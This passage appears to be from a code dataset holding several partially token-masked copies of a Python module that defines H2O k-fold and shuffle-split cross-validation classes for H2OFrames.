----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n\n\nclass H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):\n <docstring token>\n <function token>\n\n def split(self, frame, y=None):\n \"\"\"Generate indices to split data into training and test.\n\n Parameters\n ----------\n\n frame : ``H2OFrame``\n The h2o frame to split\n\n y : str, optional (default=None)\n The name of the column to stratify, if applicable.\n\n Returns\n -------\n\n train : ndarray\n The training set indices for the split\n\n test : ndarray\n The testing set indices for that split\n \"\"\"\n frame = check_frame(frame, copy=False)\n indices = np.arange(frame.shape[0])\n for test_index in self._iter_test_masks(frame, y):\n train_index = indices[np.logical_not(test_index)]\n test_index = indices[test_index]\n yield list(train_index), list(test_index)\n <function token>\n <function token>\n <function token>\n <function token>\n\n\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n is used for ``h2o_train_test_split`` in strategic train/test splits of\n H2OFrames. Implementing subclasses should override ``_iter_indices``.\n\n Parameters\n ----------\n\n n_splits : int, optional (default=2)\n The number of folds or splits in the split\n\n test_size : float or int, optional (default=0.1)\n The ratio of observations for the test fold\n\n train_size : float or int, optional (default=None)\n The ratio of observations for the train fold \n\n random_state : int or RandomState, optional (default=None)\n The random state for duplicative purposes. \n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n\n\nclass H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):\n <docstring token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n is used for ``h2o_train_test_split`` in strategic train/test splits of\n H2OFrames. Implementing subclasses should override ``_iter_indices``.\n\n Parameters\n ----------\n\n n_splits : int, optional (default=2)\n The number of folds or splits in the split\n\n test_size : float or int, optional (default=0.1)\n The ratio of observations for the test fold\n\n train_size : float or int, optional (default=None)\n The ratio of observations for the train fold \n\n random_state : int or RandomState, optional (default=None)\n The random state for duplicative purposes. \n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n is used for ``h2o_train_test_split`` in strategic train/test splits of\n H2OFrames. Implementing subclasses should override ``_iter_indices``.\n\n Parameters\n ----------\n\n n_splits : int, optional (default=2)\n The number of folds or splits in the split\n\n test_size : float or int, optional (default=0.1)\n The ratio of observations for the test fold\n\n train_size : float or int, optional (default=None)\n The ratio of observations for the train fold \n\n random_state : int or RandomState, optional (default=None)\n The random state for duplicative purposes. \n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to 